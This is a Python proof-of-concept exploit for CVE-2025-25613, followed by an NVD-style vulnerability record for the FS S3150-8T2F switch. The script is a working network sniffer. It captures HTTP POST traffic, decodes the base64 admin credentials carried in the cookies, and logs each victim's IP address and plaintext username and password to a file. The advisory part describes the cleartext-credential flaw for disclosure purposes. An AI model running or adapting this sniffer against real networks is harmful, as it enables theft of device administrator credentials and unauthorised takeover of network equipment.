CVE-2025-25613

import base64 import requests from scapy.all import sniff, IP, TCP, Raw def extract_credentials_from_cookie(cookie_header): """ Extract and decode credentials from the cookie header CVE-2025-25613 PoC - FS S3150-8T2F credential extraction """ try: # Split cookie header to find encoded credentials # The format typically contains base64 encoded username:password parts = cookie_header.split('=') if len(parts) >= 2: encoded_creds = parts[1].split(';')[0] # Decode base64 to get plaintext credentials decoded = base64.b64decode(encoded_creds).decode('utf-8') return decoded except Exception as e: print(f"[-] Decode error: {e}") return None def packet_handler(packet): """ Sniff packets and extract credentials from POST requests CVE-2025-25613 PoC - Network traffic monitoring """ if packet.haslayer(TCP) and packet.haslayer(Raw): payload = packet[Raw].load.decode('utf-8', errors='ignore') if 'POST' in payload and 'Cookie:' in payload: print(f"[+] Potential target captured from {packet[IP].src}") # Extract cookie line for line in payload.split('\n'): if line.startswith('Cookie:'): creds = extract_credentials_from_cookie(line) if creds: print(f"[!] Decoded credentials: {creds}") # Save to file with open('captured_creds.txt', 'a') as f: f.write(f"Source IP: {packet[IP].src}\n") f.write(f"Credentials: {creds}\n\n") def start_sniffing(interface='eth0'): """ Start packet sniffing on specified interface CVE-2025-25613 PoC - Credential capture """ print(f"[*] Starting packet capture on {interface}") print("[*] Press Ctrl+C to stop...\n") # Filter for HTTP POST requests (port 80) sniff(filter='tcp port 80', prn=packet_handler, iface=interface, store=0) if __name__ == '__main__': import sys interface = sys.argv[1] if len(sys.argv) > 1 else 'eth0' start_sniffing(interface)

{"cve": {"id": "CVE-2025-25613", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:02.310", "lastModified": "2026-01-15T20:08:14.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FS Inc S3150-8T2F 8-Port Gigabit Ethernet L2+ Switch, 8 x Gigabit RJ45, with 2 x 1Gb SFP, Fanless. All versions before 2.2.0D Build 135103 were discovered to transmit cookies for their web based administrative application containing usernames and passwords. These were transmitted in cleartext using simple base64 encoding during every POST request made to the server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fs:s3150-8t2f_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0D", "matchCriteriaId": "F70E4EAB-4BF6-43BA-A9C2-A88CAB42A248"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fs:s3150-8t2f:-:*:*:*:*:*:*:*", "matchCriteriaId": "45F236EE-F0B3-4D72-9F5C-E5282B6D0F5D"}]}]}], "references": [{"url": "http://fs.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://s3150-8t2f.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/SwiftSecur/S3150-8T2F-FS.com-Research/wiki", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}